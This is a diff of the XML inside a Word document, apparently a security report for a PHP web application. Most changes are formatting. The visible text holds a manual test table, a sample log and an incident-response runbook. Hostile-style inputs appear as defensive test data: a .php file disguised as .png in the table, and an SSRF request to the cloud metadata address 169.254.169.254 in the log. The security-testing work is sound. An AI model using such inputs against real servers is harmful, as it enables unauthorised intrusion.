+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -7230,36 +5925,16 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tests/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>run_tests.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>php tests/run_tests.php</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7276,7 +5951,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -7298,20 +5973,24 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="9"/>
         <w:tblW w:w="8500" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
         </w:tblBorders>
+        <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="10" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="10" w:type="dxa"/>
         </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="500"/>
@@ -7319,6 +5998,22 @@
         <w:gridCol w:w="4200"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
@@ -7381,6 +6076,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7434,6 +6145,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7487,6 +6214,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7534,32 +6277,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">6th+ attempt blocked immediately; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>account_locked</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> logged</w:t>
+              <w:t>6th+ attempt blocked immediately; account_locked logged</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7613,6 +6352,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7666,6 +6421,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7713,32 +6484,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Rejected with generic error; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>csrf_rejected</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> logged</w:t>
+              <w:t>Rejected with generic error; csrf_rejected logged</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7786,32 +6553,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Rejected; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ssrf_blocked</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> logged</w:t>
+              <w:t>Rejected; ssrf_blocked logged</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7859,32 +6622,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">HTTP 403 Forbidden; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>authorization_denied</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> logged</w:t>
+              <w:t>HTTP 403 Forbidden; authorization_denied logged</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -7915,39 +6674,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Upload a .</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> file renamed .</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>png</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Upload a .php file renamed .png</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7969,6 +6697,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="500" w:type="dxa"/>
@@ -8024,7 +6768,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -8041,52 +6785,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>A redacted, fictitious sample of the structured security log (docs/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>sample_logs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>security.log.sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>) illustrates the event trail the manual tests above would produce, including a rejected SQLi-shaped login identifier, a lockout sequence, a rejected CSRF submission, two blocked SSRF attempts, and a denied admin-access attempt:</w:t>
+        <w:t>A redacted, fictitious sample of the structured security log (docs/sample_logs/security.log.sample) illustrates the event trail the manual tests above would produce, including a rejected SQLi-shaped login identifier, a lockout sequence, a rejected CSRF submission, two blocked SSRF attempts, and a denied admin-access attempt:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -8097,7 +6805,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>{"ts":"2026-07-15T09:15:25+00:00","event":"account_locked","subject":"student1@example.test","ip":"203.0.113.7","detail":{"minutes":15}}</w:t>
       </w:r>
       <w:r>
@@ -8106,7 +6821,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>{"ts":"2026-07-15T10:07:48+00:00","event":"ssrf_blocked","subject":"student2@example.test","ip":"198.51.100.22","detail":{"url":"http://169.254.169.254/","reason":"Only https URLs are permitted"}}</w:t>
       </w:r>
       <w:r>
@@ -8115,7 +6837,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>{"ts":"2026-07-15T10:20:36+00:00","event":"authorization_denied","subject":"student2@example.test","ip":"198.51.100.22","detail":{"required_role":"admin"}}</w:t>
       </w:r>
     </w:p>
@@ -8139,11 +6868,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>8. Incident Response Runbook (Summary)</w:t>
       </w:r>
     </w:p>
@@ -8162,7 +6890,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
         <w:rPr>
           <w:b/>
@@ -8187,66 +6915,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detected via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>login_failed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>login_rate_limited</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>account_locked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> events. The application's own rate limiting and lockout contain single-account attacks automatically; an IP hitting many accounts (stuffing) is blocked at the firewall/WAF. Every incident is logged with start/end time, source IP(s), and whether any login ultimately succeeded.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>Detected via login_failed / login_rate_limited / account_locked events. The application's own rate limiting and lockout contain single-account attacks automatically; an IP hitting many accounts (stuffing) is blocked at the firewall/WAF. Every incident is logged with start/end time, source IP(s), and whether any login ultimately succeeded.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
         <w:rPr>
           <w:b/>
@@ -8271,30 +6945,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detected via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>validation_rejected</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> events containing SQL metacharacters, or abnormal response sizes from the admin search or login endpoints. Because every query is parameterised, a submitted payload cannot alter query structure even if it reaches the database layer; the response confirms whether the request was blocked at validation or reached (and was neutralised by) the database layer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>Detected via validation_rejected events containing SQL metacharacters, or abnormal response sizes from the admin search or login endpoints. Because every query is parameterised, a submitted payload cannot alter query structure even if it reaches the database layer; the response confirms whether the request was blocked at validation or reached (and was neutralised by) the database layer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
         <w:rPr>
           <w:b/>
@@ -8319,48 +6975,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detected via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ssrf_blocked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> events or unexpected outbound connections from the application server to internal/link-local/metadata addresses in network logs. If </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>UrlGuard</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> correctly rejected the request (the expected outcome), no further action is needed beyond logging; if an outbound connection is nonetheless observed, the link-preview feature is disabled immediately pending review of the allowlist and the guard logic.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>Detected via ssrf_blocked events or unexpected outbound connections from the application server to internal/link-local/metadata addresses in network logs. If UrlGuard correctly rejected the request (the expected outcome), no further action is needed beyond logging; if an outbound connection is nonetheless observed, the link-preview feature is disabled immediately pending review of the allowlist and the guard logic.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
         <w:rPr>
           <w:b/>
@@ -8390,7 +7010,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
@@ -8412,10 +7032,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
